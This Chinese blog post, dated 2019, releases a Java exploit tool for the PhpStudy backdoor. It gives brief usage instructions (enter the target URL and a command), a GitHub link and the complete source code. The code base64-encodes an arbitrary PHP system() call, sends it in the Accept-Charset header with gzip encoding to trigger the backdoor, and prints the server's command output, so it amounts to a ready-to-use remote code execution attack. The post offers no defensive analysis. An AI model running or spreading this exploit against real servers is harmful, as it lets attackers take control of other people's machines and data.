晚安 "你别急,我会慢慢的走出你的世界,不留痕迹"
开源项目|PhpStudyBackdoorExpliot|PhpStudy利用工具Java版
发表于 2019-9-25 | | 编程开发

无论如何,修改转发请带上团队版权!!!

这个是我最后的倔强了o(╥﹏╥)o

使用方式:

URL:输入漏洞地址URL,不需要加http

命令:输入需要执行的命令!

如何耐心等待即可

GitHub地址:https://github.com/52kami/PhpStudyBackdoorExploit/

import com.sun.scenario.effect.impl.sw.sse.SSEBlend_SRC_OUTPeer;
import sun.misc.BASE64Encoder;
import java.util.Scanner;
import java.io.*;
import java.net.*;
public class PhpStudyExploit {
     /*将命令转换成base64加密*/
    public static String getBASE64() {
        Scanner scanner = new Scanner(System.in);
        System.out.print("请输入需要执行的CMD命令:");
        scanner.useDelimiter("/n");
        String payload = "system('"+scanner.nextLine()+"');";
        BASE64Encoder encode = new BASE64Encoder();
        String base64 = encode.encode(payload.getBytes());
        System.out.println("你输入的命令为:"+payload);
        System.out.println("您输入的命令的BASE64加密为:"+base64);
        return base64;
    }
          /*进入主方法*/
    public static void main(String[] args) throws Exception {
        //个人工具开发版权信息
        System.out.println("+-----------------------------------------------+");
        System.out.println("+----------[PhpStudy Backdoor Exploit]----------+");
        System.out.println("+----------[开发者:SKY·SECURITY 道 ]----------+");
        System.out.println("+----------[SKY·SEC:WwW.Hi-AwSafe.CoM]---------+");
        System.out.println("+-----------------------------------------------+");
        //面向对象,让用户自主输入漏洞链接
        Scanner scan = new Scanner(System.in);
        System.out.print("请输入漏洞地址:");
        String url = scan.next();
        System.out.println("正在给URL:" + url+"利用中...");
        /*调用执行命令base64方法*/
        String base64 = getBASE64();
        /*伪造header*/
        HttpURLConnection conn = (HttpURLConnection) new URL("http://"+url).openConnection();
        conn.setRequestProperty("Upgrade-Insecure-Requests", "1");
        conn.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36");
        conn.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3");
        conn.setRequestProperty("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        conn.setRequestProperty("Accept-Encoding","gzip,deflate");
        conn.setRequestProperty("Accept-Charset",base64);
        conn.setRequestProperty("Connection","close");
        /*获取返回信息*/
        InputStream is = conn.getInputStream();
        StringBuffer servername = new StringBuffer();
        BufferedReader br = new BufferedReader(new InputStreamReader(is));
        String strLine = "";
        while ((strLine = br.readLine()) != null) {
            servername.append(strLine.trim());
        }
        /*将结果输出*/
        System.out.println("[ + ]********************************************************[ + ]");
        System.out.print("命令返回的数据:");
        String username=servername.toString();
        String payloadecho=username.substring(0,username.indexOf("<"));
        System.out.println(payloadecho);
        System.out.println("[ - ]********************************************************[ - ]");
    }
}

发表评论:

TOP